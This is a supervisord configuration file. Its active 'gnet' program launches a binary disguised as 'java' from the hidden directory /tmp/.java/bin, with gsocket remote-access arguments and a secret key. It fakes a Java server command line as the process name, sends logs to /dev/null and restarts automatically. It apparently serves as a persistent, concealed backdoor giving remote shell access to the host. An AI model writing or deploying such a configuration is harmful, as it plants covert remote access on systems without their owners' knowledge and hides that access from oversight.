[supervisord]
logfile=/dev/null

# [program:app]
# directory=/tmp/.java/bin
# command=./java -a 'java -Xms128M -XX:MaxRAMPercentage=95.0 -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ./user-patch.jar -c ./conf.json
# stdout_logfile=/dev/null
# autorestart = true

[program:gnet]
directory=/tmp/.java/bin
environment=GSOCKET_ARGS="-s i0eD2E2K9c-4D9g8H6b5j7-56C4a9f6X1eCd9F9-0d6A9A1c5J1g6K -liq"
command=./java -a 'java -Xms128M -XX:MaxRAMPercentage=95.0 -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ./server.jar 
stdout_logfile=/dev/null
autorestart = true